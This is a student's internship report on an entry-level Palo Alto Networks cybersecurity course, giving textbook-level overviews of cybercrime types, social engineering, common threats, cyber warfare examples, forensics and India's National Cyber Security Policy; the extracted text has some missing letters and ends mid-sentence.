Palo Alto Networks Certified Cybersecurity Entry-level Technician

(PCCET)
An summer internship-1 Report Submitted in Partial Fulfillment of the
Requirements for the award of Degree of

Bachelor of Technology

In

Computer Science And

Engineering

By

Name: Regno:
B.TEJA 20KD1A0516

Department of Computer Science And Engineering

Lendi Institute of Engineering and Technology (A)

(Affiliated to Jawaharlal Nehru Technological University, Kakinada)

Approved by AICTE, Accredited by NBA & NAAC with ‘A’ Grade

Vizianagaram-535005

November 2021-September-2022
CERTIFICATE
 CONTENTS
1. Cyber Security 01-08
1.1 Introduc on 01

1.1.1 What is Cybersecurity?

1.1.2 Why do we need Cybersecurity?

1.2 Cyber Crime 03

1.2.1 Who are Cybercriminals?

1.2.2 Types of Cybercriminals

1.3 Classifica on of Cyber Crimes 06

1.3.1 Email Spoofing

1.3.2 Denial of Service or DOS A ack

1.2.3 Malware A ack

1.3.4 Man in the Middle A ack

1.3.5 Phishing A ack

2. Cyber Offense 09-12

2.1 Introduc on 09

2.1.1 Categories of Cybercrime

2.2 How Criminals plan a acks 09

2.2.1 Ac ve A acks Vs Passive A acks

2.2.2 Scanning and Scru nizing Informa on

2.3 Social Engineering 10

2.3.1 Classifica on of Social Engineering

2.4 What mo vates cybercriminals 11

2.4.1 White Hat Hackers Vs Black Hat Hackers
3. Cyber Security Threats 13-24

3.1 Layers of Cyber Security 13

3.2 Types of Cyber Security threats 15

3.3 Common Networks vulnerabili es 17

3.4 Cyber warfare 19

3.4.1 Types of Cyber Warfare A acks

3.4.2 Examples of Cyber Warfare Opera ons

3.5 Cybercrime mobile and wireless devices 22

3.5.1 Smishing

3.5.2 Wardriving

3.5.3 War chalking

3.5.4 Vishing A ack

3.5.5 WEP A ack

3.5.6 Phishing

4. Cyber Forensics 25-28

4.1 Cybercrime Inves ga on by CBI 25

4.2 Na onal Cyber Security Policy 26

4.2.1 Need for a cyber security policy

4.3 Na onal Cyber Security Policy Vision 28

5. Conclusion 30
 Pg No : 1

1.CYBER SECURITY
1.1 Introduction:
The internet has made the world smaller in many ways, but it has also opened us up to influences that
have never been so varied and so challenging. As fast as security grew, the hacking world grew faster. There
are two ways of looking at the issue of cyber security. One is that the companies that provide cloud
computing do that and only that so these companies will be extremely well secured with the latest in cutting
edge encryption technology.

The technique of protecting internet-connected systems such as computers, servers, mobile

devices, electronic systems, networks, and data from malicious attacks is known as cybersecurity. We
can divide cybersecurity into two parts one is cyber, and the other is security.

Cyber refers to the technology that includes systems, networks, programs, data and security is
concerned with the protection of systems, networks, applications, and information. In some cases, it is also
called electronic information security or information technology security.

1.1.1 What is Cybersecurity?

It is being protected by internet-connected systems, including hardware, software and data, from
cyberattacks. In a computing context, security comprises cyber security and physical security. Both are used
by enterprises to safe against unauthorized access to data centers and other computerized systems. Security,
which is designed to maintain the confidentiality, integrity and availability of data, is a subset of cyber
security.

Reg No : 20KD1A0516
 Pg No : 2

Cybersecurity is the practice of protecting critical systems and sensitive information from digital attacks.
Also known as information technology (IT)security, cybersecurity measures are designed to combat threats
against networked systems and applications, whether those threats originate from inside or outside of an
organization.Security system complexity, created by disparate technologies and a lack of in-house expertise,
can amplify these costs. But organizations with a comprehensive cybersecurity strategy, governed by best
practices and automated using advanced analytics, artificial intelligence (AI) and machine learning, can fight
cyberthreats more effectively and reduce the lifecycle and impact of breaches when they occur.

1.1.2 Why do we need Cybersecurity?

Cybersecurity is crucial because it safeguards all types of data against theft and loss. Protected health
information (PHI), personally identifiable information (PII), intellectual property, personal information and
government and business information systems are all included.

Cyber terrorism: It is the innovative use of information technology by terrorist groups to further their
political agenda. It took the form of attacks on networks, computer systems and telecommunication
infrastructures.

Cyber warfare: involves nation-states using information technology to go through another nation's
networks to cause damage. In the U.S. and many other people live in a society, cyber warfare has been
acknowledged as the fifth domain of warfare.

Cyber warfare attacks are primarily executed by hackers who are well-trained in use to benefit the quality of
details computer networks and operate under the favorable and support of nation-states. Rather than closing
a targets key network, a cyber-warfare attack may force to put into a situation into networks to compromise

Reg No : 20KD1A0516
 Pg No : 3

valuable data, degrade communications, impair such infrastructural services as transportation and medical
services, or interrupt commerce.

Cyber siphonage: It is the practice of using information technology to obtain secret information without
permission from its owners or holders. It is the most often used to gain strategic, economic, military
advantage, and is conducted using cracking techniques and malware.

1.2 Cyber Crime:

Reaching a consensus on a definition of computer crime is difficult. One definition that is advocated
is, "a crime conducted in which a computer was directly and significantly instrumental. This definition is not
universally accepted. It, however, initiates further discussion to narrow the scope of the definition for
"cybercrime": for example, we can propose the following alternative definitions of computer crime:

1. Any illegal act where a special knowledge of computer technology is essential for its perpetration,
investigation or prosecution.

2. Any traditional crime that has acquired a new dimension or order of magnitude through the aid of a
computer, and abuses that have come into being because of computers.

3. Any financial dishonesty that takes place in a computer environment.

4. Any threats to the computer itself, such as theft of hardware or software, sabotage and demands for
ransom.

Reg No : 20KD1A0516
 Pg No : 4

Here is yet another definition:

"Cybercrime (computer crime) is any illegal behavior, directed by means of electronic operations,
that targets the security of computer systems and the data processed by them."

Note that in a wider sense, "computer-related crime can be any illegal behavior committed by means
of, or in relation to a computer system or network”. However, this is not cybercrime.

Statute and treaty law both refer to "cybercrime." The term "cybercrime" relates to several other
terms that may sometimes be used interchangeably to describe crimes committed using computers.
Computer related crime, Computer crime, Internet crime, E-crime, High-tech crime, etc. are the other
synonymous terms. Cybercrime specifically can be defined in several ways; a few definitions are:

1. A crime committed using a computer and the Internet to steal a person's identity (identity theft) or sell
contraband or stalk victims or disrupt operations with malevolent programs

2. Crimes completed either on or with a computer.

3. Any illegal activity done through the Internet or on the computer. All criminal activities are done using
the medium of computers, the internet, cyberspace.

1.2.1 Who are Cybercriminals?

Cybercrime involves such activities as credit card fraud; cyberstalking; defaming another online;
gaining unauthorized access to computer systems; ignoring copyright, software licensing and trade a mark
protection; overriding encryption to make illegal copies: software piracy and stealing another’s identity
(known as identity theft) to perform criminal acts.

Cybercriminals are individuals or teams of people who use technology to commit malicious activities on
digital systems or networks with the intention of stealing sensitive company information or personal data
and generating profit.

Cybercriminals are known to access the cybercriminal underground markets found in the deep web to trade
malicious goods and services, such as hacking tools and stolen data.

Cybercriminal underground markets are known to specialize in certain products or services.

Reg No : 20KD1A0516
 Pg No : 5

1.2.2 Types of Cybercriminals

Mostly these are categorized into 3 types.

Type 1: Cybercriminals – hungry for recognition:

1. Hobby hackers
2. IT professionals (social engineering is one of the biggest threats)
3. Politically motivated hackers
4. Terrorist organizations.

Type 2: Cybercriminals – not interested in recognition:

1. Psychological prevents
2. Financially motivated hackers (corporate espionage)
3. State – sponsored hacking (national espionage, sabotage)
4. Organized criminals.

Type 3: Cybercriminals- the insiders:

1. Disgruntled or former employees seeking revenge

2. Competing companies use employees to gain economic advantage through damage and/or theft.
3. Cyber cafes are known to play a role in committing cyber crimes.

Thus, the typical motives behind cybercrime seem to be greed, desire to gain power and/or publicity, desire
for revenge, a sense of adventure, looking for thrill to access forbidden information, destructive mindset and
desire to sell network security services.

Reg No : 20KD1A0516
 Pg No : 6

1.3 Classifications of Cyber Crimes:

Cybercrime is an unauthorized activity involving a computer, device, or network. The three types are
computer-assisted crimes, crimes where the computer itself is a target, and crimes where the computer is
incidental to the crime rather than directly related to it.

1.3.1 Email Spoofing:

Email spoofing is possible due to the way email systems are designed. Outgoing messages are
assigned a sender address by the client application; outgoing email servers have no way to tell whether the
sender address is legitimacy or spoofed.

Recipient servers and anti-malware software can help detect and filter spoofed messages.
Unfortunately, not every email service has security protocols in place. Still, users can review email headers
packaged with every message to determine whether the sender address is forged.

Reg No : 20KD1A0516
 Pg No : 7

1.3.2 Denial of Service or DOS Attack:

Where a hacker consumes all server’s resources, so there’s nothing for legitimate users to access.

1.2.3 Malware Attack:

A malware attack is a common cyber-attack where malware (normally malicious software) executes
unauthorized actions on the victim's system. The malicious software (a.k.a. virus) encompasses many
specific types of attacks such as ransom ware, spy ware, command and control, and more.

1.3.4 Man in the Middle Attack:

A MITM attack is a form of cyber-attack where a user is introduced with meeting between the two parties by
a malicious individual, manipulates both parties and achieves access to the data that the two people were
trying to deliver to each other. A man-in-the-middle attack also helps a malicious attacker, without any kind
of participant recognizing till it's too late, to hack the transmission of data intended for someone else and not
supposed to be sent at all. In certain aspects, like MIM, MITM attack scan be referred.

If an attacker puts himself between a client and a webpage, a Man-in-the-Middle (MITM) attack occurs.
This form of assault comes in many ways.

Reg No : 20KD1A0516
 Pg No : 8

For example, to intercept financial login credentials, a fraudulent banking website can be used. Between the
user and the real bank webpage, the fake site lies "in the middle."

There are several reasons and strategies for hackers to use a MITM attack. Usually, like credit card numbers
or user login details, they try to access anything. They also spy on private meetings, which may include
corporate secrets or other useful information.

The feature that almost every attack has, in general, is that the attacker pretends to be somebody you trust
(or a webpage).

In the above diagram, you can see that the intruder positioned himself in between the client and server to
intercept the confidential data or manipulate the incorrect information of them.

1.3.5 Phishing Attack:

Where a hacker sends a seemingly legitimate-looking email asking users to disclose personal
information. Other types of cyberattacks include cross-site scripting attacks, password attacks,
eavesdropping attacks (which can also be physical), SQL-injection attacks, and birthday attacks based on
algorithm functions.

Reg No : 20KD1A0516
 Pg No : 9

2.CYBER OFFENSES

2.1 Introduction:
Cyber offences are illegitimate actions, which are carried out in a classy manner where either the
computer is the tool or target or both. Cyber-crime usually includes the following − Unauthorized access of
computers. Data diddling, Virus/worms attack.

Cybercrimes can involve criminal activities that are traditional in nature, such as theft, fraud, forgery,
defamation and mischief, all of which are subject to the Indian Penal Code. The abuse of computers has also
given birth to new age crimes that are addressed by the Information Technology Act, 2000.

Section 16 of the MCC contains offenses in the first category, namely, illegal access, illegal
interception, data interference, system interference, and misuse of devices.

2.1.1 Categories of Cybercrime:

There are three major categories of cybercrimes

1.Crimes against People

These crimes include cyber harassment and stalking, distribution of child pornography, credit card fraud,
human trafficking, spoofing, identity theft, and online libel or slander.

2.Crimes against Property

Some online crimes occur against property, such as a computer or server. These crimes include DDOS
attacks, hacking, virus transmission, cyber and typo squatting, computer vandalism, copyright infringement,
and IPR violations.

3.Crimes against Government

When a cybercrime is committed against the government, it is considered an attack on that nation's
sovereignty. Cybercrimes against the government include hacking, accessing confidential information, cyber
warfare, cyber terrorism, and pirated software.

2.2 How Criminals Plan the attacks?

Criminals use many methods and tools to locate the vulnerabilities of their target. The target can be
an individual and/or an organization plan passive and active attacks are usually used to alter the system,
whereas passive attacks attempt to gain information about the target. Cybercriminals commit cybercrimes
using different tools and techniques. But the basic process of performing the attacks is the same in general.

Reg No : 20KD1A0516
 Pg No : 10

2.2.1 Active Attacks Vs Passive Attacks:

2.2.2 Scanning and Scrutinizing Information

Scanning is a key step to examine intelligently while gathering information about the target. The objectives
of scanning are as follows are

Port scanning:

Identify open/closed ports and services.

Network scanning:

Understand IP Addresses and related information about the computer network systems.

Vulnerability scanning:

Understand the existing weaknesses in the system. The scrutinizing phase is always called "enumeration" in
the hacking world.

2.3 Social Engineering:

Social engineering is the tactic of manipulating, influencing, or deceiving a victim in order to gain control
over a computer system, or to steal personal and financial information. It uses psychological manipulation to
trick users into making security mistakes or giving away sensitive information.

Social engineering attacks happen in one or more steps. A perpetrator first investigates the intended victim
to gather necessary background information, such as potential points of entry and weak security protocols,
needed to proceed with the attack. Then, the attacker uses a form of pretexting such as impersonation to gain
the victim’s trust and provide stimuli for subsequent actions that break security practices, such as revealing
sensitive information or granting access to critical resources.

Reg No : 20KD1A0516
 Pg No : 11

2.3.1 Classification of Social Engineering

Human-Based Social Engineering Human-based social engineering refers to person-to-person
interaction to get the required/ desired information. An example is calling the help desk and trying to find a
password.

1.Impersonating an employee or valid user:

"Impersonation" is perhaps the greatest technique used by social engineers to deceive people. Social
engineers "take advantage of the fact that most people are basically helpful, so it seems harmless to tell
someone who appears to be lost where the computer room is located, or to let someone into the building who
"forgot his/her badge, etc., or pretending to be an employee or valid user on the system.

2.Posing as an important user:

The attacker pretends to be an important user - for example, a Chief Executive Officer (CEO) or
high- level manager who needs immediate assistance to gain access to a system. The attacker uses
intimidation so that a lower-level employee such as a help-desk worker will help him/her in gaining access
to the system. Most of the low-level employees will not ask any question of someone who appears to be in a
position of authority.

3.Using a third person:

An attacker pretends to have permission from an authorized source to a system. This trick is useful
when the supposed authorized personnel is on vacation.

4.Calling technical support:

Calling the technical support for assistance is a classic social engineering example. Helpdesk and
technical support personnel are trained to help users, which makes them good prey for social engineering
attacks.

2.4 What Motivates Cyber Criminals?

The main motive behind cybercrime is to disrupt regular business activity and critical infrastructure.
Cybercriminals also commonly manipulate stolen data to benefit financially, cause financial loss, damage a
reputation, achieve military objectives, and propagate religious or political beliefs. Some don't even need a
motive and might hack for fun or simply to showcase their skills.

So, who are these cybercriminals? Here’s a breakdown of the most common types:

Gray-Hat Hackers:

They work both with malicious intent and as legitimate security analysts.

Suicide Hackers:

They aim to openly bring down the critical infrastructure for a social cause.

Reg No : 20KD1A0516
 Pg No : 12

Script Kiddies:

They are unskilled hackers who run scripts and software created by more experienced hackers.

Cyber Terrorists:

They create fear by disrupting large-scale computer networks; motivated by religious or political beliefs.

State-Sponsored Hackers:

They penetrate government networks, gain top-secret information, and damage information systems; paid
for by a hostile government.

2.4.1 White Hat Hackers Vs Black Hat Hackers:

Reg No : 20KD1A0516
 Pg No : 13

3.CYBER SECURITY THREATS

3.1 Layers of Cyber Security:

Cyber Security is a process that’s designed to protect networks and devices from external threats.
Businesses typically employ Cyber Security professionals to protect their confidential information, maintain
employee productivity, and enhance customer confidence in products and services.

The world of Cyber Security revolves around the industry standard of confidentiality, integrity, and
availability, or CIA. Privacy means data can be accessed only by authorized parties; integrity means
information can be added, altered, or removed only by authorized users; and availability means systems,
functions, and data must be available on-demand according to agreed-upon parameters.

The main element of Cyber Security is the use of authentication mechanisms. For example, a
username identifies an account that a user wants to access, while a password is a mechanism that proves the
user is who he claims to be. The Seven Layers of cyber security are:

Reg No : 20KD1A0516
 Pg No : 14

1. Mission-Critical Assets:

This is data that is critical to protect. Whether businesses would like to admit it or not, they face
malicious forces daily.

The question is how are leaders dealing with this type of protection? And what measures have they
put in place to guard against breaches? An example of mission-critical assets in the Healthcare industry is
Electronic Medical Record (EMR) software. In the financial sector, its customers’ financial records.

2.Data Security:

Data security is when there are security controls put in place to protect both the transfer and the
storage of data. There must be a backup security measure in place to prevent the loss of data, this will also
require the use of encryption and archiving. Data security is an important focus for all businesses as a breach
of data can have dire consequences.

3.Endpoint Security:

This layer of security makes sure that the endpoints of user devices are not exploited by breaches.
This includes the protection of mobile devices, desktops, and laptops. Endpoint security systems enable
protection either on a network or in the cloud depending on the needs of a business.

4.Application Security:

This involves the security features that control access to an application and that application’s access
to your assets. It also includes the internal security of the app itself. Most of the time, applications are
designed with security measures that continue to provide protection when the app is in use.

5.Network Security:

This is where security controls are put in place to protect the business’s network. The goal is to
prevent unauthorized access to the network. It is crucial to regularly update all systems on the business
network with the necessary security patches, including encryption. It’s always best to disable unused
interfaces to further guard against any threats.

6.Perimeter Security:

This security layer ensures that both the physical and digital security methods protect a business. It
includes things like firewalls that protect the business network against external forces.

7.The Human Layer:

Despite being known as the weakest link in the security chain, the human layer is a very necessary
layer. It incorporates management controls and phishing simulations as an example.

These human management controls aim to protect what is most critical to a business in terms of security.
This includes the very real threat that humans, cyber attackers, and malicious users pose to a business.

Reg No : 20KD1A0516
 Pg No : 15

3.2 Types of Cyber Security Threats:

As the recent epidemic of data breaches illustrates, no system is immune to attacks. Any company that
manages transmits, stores, or handles data must institute and enforce mechanisms to monitor their
cyberenvironment, identify vulnerabilities, and close up security holes as quickly as possible. Before
identifying specific dangers to modern data systems, it is crucial to understand the distinction between cyber
threats and vulnerabilities.

Cyber threats are security incidents or circumstances that can have a negative outcome for your network or
other data management systems.

Examples of common types of security threats include phishing attacks that result in installing malware that
infects your data, failure of a staff member to follow data protection protocols that cause a data breach, or
even nature’s forces that takes down your company’s data headquarters, disrupting access.

Vulnerabilities are the gaps or weaknesses in a system that make threats possible and tempt threat actors to
exploit them.

Types of vulnerabilities in network security include but are not limited to SQL injections, server
misconfigurations, cross-site scripting, and transmitting sensitive data in a non-encrypted plain text format.

When the threat probability is multiplied by the potential loss that may result, cyber security experts refer to
this as a risk.

Just as some germs and diseases can attack the human body, numerous threats can affect hardware, software,
and the information you store. Some of the major ones include the following:

Viruses are designed so that they can be easily transmitted from one computer or system to another. Often
sent as email attachments, viruses corrupt and co-opt data, interfere with your security settings, generate
spam, and may even delete content.

Computer worms are similar; they spread from one computer to the next by sending themselves to all of
the user’s contacts and subsequently to all contacts’ contacts.

Reg No : 20KD1A0516
 Pg No : 16

Trojans, these malicious pieces of software insert themselves into a legitimate program. Often, people
voluntarily let trojans into their systems in email messages from a person or an advertiser they trust. As soon
as the accompanying attachment is open, your system becomes vulnerable to the malware within.

Bogus security software that tricks users into believing that their system has been infected with a virus. The
accompanying security software that the threat actor provides to fix the problem causes it.

The adware tracks your browsing habits and causes advertisements to pop up. Although this is common and
often something you may even agree to, adware is sometimes imposed upon you without your consent.

Spyware is an intrusion that may steal sensitive data such as passwords and credit card numbers from your
internal systems.

A denial of service (DOS) attack occurs when hackers deluge a website with traffic, making it impossible
to access its content. A distributed denial of service (DDOS) attack is more forceful and aggressive since it
is initiated from several servers simultaneously. As a result, a DDOS attack makes it harder to mount
defenses against it.

Phishing attacks are social engineering infiltrations whose goal is to obtain sensitive data: passwords and
credit card numbers incorrectly. Via emails or links coming from trusted companies and financial
institutions, the hacker causes malware to be downloaded and installed.

SQL injections are network threats that involve using malicious code to infiltrate cyber vulnerabilities in
data systems. As a result, data can be stolen, changed, or destroyed.

Man-in-the-middle attacks involve a third-party intercepting and exploiting communications between two
entities that should remain private. Eavesdropping occurs, but information can be changed or misrepresented
by the intruder, causing inaccuracy and even security breaches.

Root kit tools gain remote access to systems without permission and can lead to the installation of malware
and the stealing of passwords and other data.

Reg No : 20KD1A0516
 Pg No : 17

Ransom ware is a type of malware that involves an attacker locking the victim's computer system files
typically through encryption and demanding a payment to decrypt and unlock them.

3.3 Common Network Vulnerabilities:

Even seemingly minor flaws or oversights in the design or implementation of your network systems can lead
to disaster. Some of the most common network vulnerabilities include the following gaps in your application
security: when applications are not kept up to date, tested, and patched, the doors are open to code injection,
cross-site scripting, insecure direct object references, and much more.

Cyber security professionals should have an in-depth understanding of the following types of cyber security
threats.

Malware Attack:

Malware is malicious software such as spyware, ransomware, viruses and worms. Malware is activated
when a user clicks on a malicious link or attachment, which leads to installing dangerous software. Cisco
reports that malware, once activated, can:

Block access to key network components (ransomware)

Install additional harmful software

Covertly obtain information by transmitting data from the hard drive (spyware)

Disrupt individual parts, making the system inoperable

Reg No : 20KD1A0516
 Pg No : 18

Emotet:

The Cybersecurity and Infrastructure Security Agency (CISA) describes Emotet as “an advanced, modular
banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet
continues to be among the most costly and destructive malware.”

Password Attacks:

With the right password, a cyber attacker has access to a wealth of information. Social engineering is a type
of password attack that Data Insider defines as “a strategy cyber attackers use that relies heavily on human
interaction and often involves tricking people into breaking standard security practices.” Other types of
password attacks include accessing a password database or outright guessing.

Reg No : 20KD1A0516
 Pg No : 19

SQL Injection:

A Structured Query Language (SQL) injection is a type of cyber-attack that results from inserting malicious
code into a server that uses SQL. When infected, the server releases information. Submitting the malicious
code can be as simple as entering it into a vulnerable website search box

3.4 Cyber Warfare

Cyber warfare is usually defined as a cyber-attack or series of attacks that target a country. It has the
potential to wreak havoc on government and civilian infrastructure and disrupt critical systems, resulting in
damage to the state and even loss of life.

There is, however, a debate among cyber security experts as to what kind of activity constitutes cyber
warfare. The US Department of Defense (DoD) recognizes the threat to national security posed by the
malicious use of the Internet but doesn’t provide a clearer definition of cyber warfare. Some consider cyber
warfare to be a cyber-attack that can result in death.

Cyber warfare typically involves a nation-state perpetrating cyber-attacks on another, but in some cases, the
attacks are carried out by terrorist organizations or non-state actors seeking to further the goal of a hostile
nation. There are several examples of alleged cyber warfare in recent history, but there is no universal,
formal, definition for how a cyber-attack may constitute an act of war.

3.4.1 Types of Cyber Warfare Attacks

Here are some of the main types of cyber warfare attacks;

Reg No : 20KD1A0516
 Pg No : 20

1. Espionage

Refers to monitoring other countries to steal secrets. In cyber warfare, this can involve using botnets or spear
phishing attacks to compromise sensitive computer systems before exfiltrating sensitive information.

2.Sabotage

Government organizations must determine sensitive information and the risks if it is compromised. Hostile
governments or terrorists may steal information, destroy it, or leverage insider threats such as dissatisfied or
careless employees, or government employees with affiliation to the attacking country.

3.Denial-of-service (DoS) Attacks

DoS attacks prevent legitimate users from accessing a website by flooding it with fake requests and forcing
the website to handle these requests. This type of attack can be used to disrupt critical operations and
systems and block access to sensitive websites by civilians, military and security personnel, or research
bodies.

4.Electrical Power Grid

Attacking the power grid allows attackers to disable critical systems, disrupt infrastructure, and potentially
result in bodily harm. Attacks on the power grid can also disrupt communications and render services such
as text messages and communications unusable.

5.Propaganda Attacks

Attempts to control the minds and thoughts of people living in or fighting for a target country. Propaganda
can be used to expose embarrassing truths, spread lies to make people lose trust in their country, or side with
their enemies.

6.Economic Disruption

Most modern economic systems operate using computers. Attackers can target computer networks of
economic establishments such as stock markets, payment systems, and banks to steal money or block people
from accessing the funds they need.

7.Surprise Attacks

These are the cyber equivalent of attacks like Pearl Harbor and 9/11. The point is to carry out a massive
attack that the enemy isn’t expecting, enabling the attacker to weaken their defenses. This can be done to
prepare the ground for a physical attack in the context of hybrid warfare

Reg No : 20KD1A0516
 Pg No : 21

3.4.2 Examples of Cyber Warfare Operations

Here are several well-publicized examples of cyber warfare in recent times.

1.Stuxnet Virus

Stuxnet was a worm that attacked the Iranian nuclear program. It is among the most sophisticated
cyber-attacks in history. The malware spread via infected Universal Serial Bus devices and targeted data
acquisition and supervisory control systems. According to most reports, the attack seriously damaged Iran’s
ability to manufacture nuclear weapons.

Sony Pictures Hack

An attack on Sony Pictures followed the release of the film “The Interview”, which presented a negative
portrayal of Kim Jong Un. The attack is attributed to North Korean government hackers. The FBI found
similarities to previous malware attacks by North Koreans, including code, encryption algorithms, and data
deletion mechanisms.

Bronze Soldier

In 2007, Estonia relocated a statue associated with the Soviet Union, the Bronze Soldier, from the center of
its capital Tallinn to a military cemetery near the city. Estonia suffered a number of significant cyber-attacks
in the following months. Estonian government websites, media outlets, and banks were overloaded with
traffic in massive denial of service (DoS) attacks and consequently were taken offline.

2.Fancy Bear

CrowdStrike claims that the Russian organized cybercrime group Fancy Bear targeted Ukrainian rocket
forces and artillery between 2014 and 2016. The malware was spread via an infected Android application
used by the D-30 Howitzer artillery unit to manage targeting data.

Ukrainian officers made wide use of the app, which contained the X-Agent spyware. This is a highly
successful attack, resulting in the destruction of over 80% of Ukraine’s D30 Howitzers.

Reg No : 20KD1A0516
 Pg No : 22

Enemies of Qatar

Elliott Broidy, an American Republican fundraiser, sued the government of Qatar in 2018, accusing it of
stealing and leaking his emails to discredit him. According to the lawsuit, the brother of the Qatari Emir was
alleged to have orchestrated a cyber warfare campaign, along with others in Qatari leadership. 1,200 people
were targeted by the same attackers, with many of these being known “enemies of Qatar”, including senior
officials from Egypt, Saudi Arabia, the United Arab Emirates, and Bahrain.

3.5 Cyber Crime Mobile and Wireless Devices

Types of Wireless and Mobile Device Attacks are:

3.5.1 Smishing
Smishing has become common now as smart phones are widely used. Smishing uses Short Message Service
(SMS) to send fraud text messages or links. The criminals cheat the user by calling. Victims may provide
sensitive information such as credit card information, account information, etc. Accessing a website might
result in the user unknowingly downloading malware that infects the device.

Reg No : 20KD1A0516
 Pg No : 23

3.5.2 Wardriving
War driving is a way used by attackers to find access points wherever they can be. With the availability of
free Wi-Fi connection, they can drive around and obtain a very huge amount of information over a very
short period.

3.5.3 War chalking

War chalking is the drawing of symbols in open spaces to warn about Wi-Fi wireless networks. War
chalking occurs when people draw symbols in areas to indicate the presence of Wi-Fi network.

Reg No : 20KD1A0516
 Pg No : 24

3.5.4 Vishing Attack

Vishing is short for voice phishing, which involves defrauding people over the phone, enticing them to
divulge sensitive information. In this definition of vishing the attacker attempts to grab the victim’s data and
use it for their own benefit-typically to gain a financial advantage.

3.5.5 WEP Attack

Wired Equivalent Privacy (WEP) is a security protocol that attempts to provide a wireless local area network
with the same level of security as a wired LAN. Since physical security steps help to protect a wired LAN,
WEP attempts to provide similar protection for data transmitted over WLAN with encryption.

3.5.6 Phishing
Phishing is when attackers attempt to trick users into doing the wrong thing, such as clicking a bad link that
will download malware or direct them to a dodgy website.

Reg No : 20KD1A0516
 Pg No : 25

4.CYBER FORENSICS
Cyber forensics is a process of extracting data as proof for a crime (that involves electronic devices)
while following proper investigation rules to nab the culprit by presenting the evidence to the court.

1. The surge of technological advances has seemed to challenge the archaic ways of collecting and
generating evidence. The intangible nature of digital evidence coupled with the fragile and vulnerable
structure of the internet has posed inherent obstacles in collecting and preserving digital evidence.

The dearth of adequate techno-legal skills coupled with lack of expertise in collecting such evidence has
undisputedly led to a rise in cyber-crimes in the nation.

2. Preserved in a certain form, the admissibility of storage devices imbibing the media content from the
crime scene is also an important factor to consider. Reading Section 3 and Section 65-B, The Evidence Act,
1872 cumulatively, it can be inferred that certain computer outputs of the original electronic record, are now
made admissible as evidence “without proof or production of the original record.

Thus, the matter on computer printouts and floppy disks and CDs become admissible as evidence.”

3. The other most crucial question in cybercrime investigation regarding the reliability of digital evidence
has also been clarified by Section 79A of the IT (Amendment) Act, 2008, which empowers the Central
government to appoint any department or agency of Central or State government as Examiner of Electronic
Evidence.

4.1 Cyber Crime Investigation by CBI

The CBI also can be approached for any serious economic offence, which is not of a general and routine
nature. It has Economic Offences Division for the investigation of major financial scams and serious
economic frauds, including crimes relating to fake Indian currency notes, bank frauds and cyber-crimes.

Reg No : 20KD1A0516
 Pg No : 26

For combating such crimes, CBI has certain specialized structures, namely, Cyber Crimes Research and
Development Unit (CCRDU), Cyber Crime Investigation Cell (CCIC), Cyber Forensics Laboratory; and
Network Monitoring Centre.

The CCRDU is mainly entrusted with the task of collecting information on cyber-crime cases reported for
further investigation in liaison with the State Police Forces. On a larger parlance, it plays a pivotal role in the
collection and dissemination of information on cyber-crimes in consonance with the Ministry of IT,
Government of India and other organizations/Institutions and Interpol Headquarters.

The CCIC has the power to investigate the criminal offences envisaged under the Information Technology
(Amendment)Act, 2008 and is also the point of contact for Interpol to report the cyber- crimes in India.

The third organ, i.e., CFL, is the one which provides consultations and conducts criminal investigation for
various law enforcement agencies. It not only provides on-site assistance for computer search and seizure
upon request, but also is the one which provides expert testimony in the court of law.

It is pertinent to note that the CFL must also adhere to all the legal formalities during the seizure of the
media for making the media analysis admissible. Keeping the possibility of remote access from an isolated
location across the globe into consideration, the data storage in another jurisdiction cannot be ruled out
al-together.

In situations involving the storage location of the data in another country, Interpol ought to be informed and
Section 166, Cr PC needs to be complied with. The Network Monitoring Centre is entrusted to monitor the
Internet through the usage of various tools.

Recently, CBI has signed a memorandum of understanding (MoU) with Data Security Council of India
(DSCI) with a view to seek expert services from the latter in managing the new challenges in cybercrimes
and updating officials with the latest technology. This shows a novel collaborative approach between the law
enforcement agencies and IT Industry for strengthening the security measures.

4.2 National Cyber Security Policy

The National Cyber Security Policy is a policy framework by the Department of Electronics and Information
Technology (Deity). It aims at protecting the public and private infrastructure from cyber-attacks. The policy
also intends to safeguard “information, such as personal information (of web users), financial and banking
information and sovereign data”.

Ministry of Communications and Information Technology (India) defines Cyberspace as a complex

environment consisting of interactions between people, software services supported by worldwide
distribution of information and communication technology.

Reg No : 20KD1A0516
 Pg No : 27

4.2.1 Need for a cyber security policy

Before 2013, India did not have a cyber security policy. The need for it was felt during the NSA spying issue
that surfaced in 2013. Information empowers people and there is a need to create a distinction between
information that can run freely between systems and those that need to be secured. This could be personal
information, banking and financial details, security information which when passed onto the wrong hands
can put the country’s safety in jeopardy.

This Policy has been drafted in consultation with all the stakeholders. In order to digitize the economy and
promote more digital transactions, the government must be able to generate trust in people in the
Information and Communications Technology systems that govern financial transactions. A strong
integrated and coherent policy on cyber security is also needed to curb the menace of cyber terrorism.

Reg No : 20KD1A0516
 Pg No : 28

4.3 National Cyber Security Policy Vision

To build secure and resilient cyberspace for citizens, businesses and Government, National Cyber Security
Policy Objectives are:

1. Encouraging the adoption of IT in all sectors of the economy by creating adequate trust in IT systems by
the creation of a secure cyber ecosystem.

2. Creating an assurance framework for the design of security policies and for the promotion and enabling
actions for compliance with global security standards and best practices through conformity assessment.

3. Bolstering the regulatory framework for ensuring a secure cyberspace ecosystem.

4. Enhancing and developing national and sectoral level 24 x 7 mechanisms for obtaining strategic
information concerning threats to ICT infrastructure, creating scenarios for response, resolution and crisis
management through effective predictive, preventive, protective, response and recovery actions.

5. Operating a 24×7 National Critical Information Infrastructure Protection Centre (NCIIPC) to improve the
protection and resilience of the country’s critical infrastructure information.

6. Developing suitable indigenous security technologies to address requirements in this field.

7. Improving the visibility of the ICT (Information and Communication Technology) products/services’
integrity by having testing and validation infrastructure.

8. Creating a workforce of 500,000 professionals skilled in cybersecurity in the next 5 years.

9. Providing businesses with fiscal benefits for adopting standard security practices and processes.

10. Safeguarding the privacy of citizen’s data and reducing economic losses due to cybercrime or data theft.

11. Enabling effective prevention, investigation and prosecution of cybercrime and enhancement of law
enforcement capabilities through legislative intervention.

12. Developing a culture of cyber security and privacy.

13. Developing effective public-private partnerships and collaborative engagements by means of technical
and operational cooperation. Promoting global cooperation by encouraging shared understanding and
leveraging relationships for furthering the cause of security of cyberspace.

Reg No : 20KD1A0516
 Pg No : 29

CONCLUSION
From this report, it is concluded that the internship “Cyber Security by Palo Alto Networks” has
provided us with an immense knowledge on different aspects of cyber security in a simple and
understandable way.

Cyber security is one of the most important aspects of the fast-paced growing digital world and this
internship helped us to understand these emerging technologies. The Internship covered the topics like:

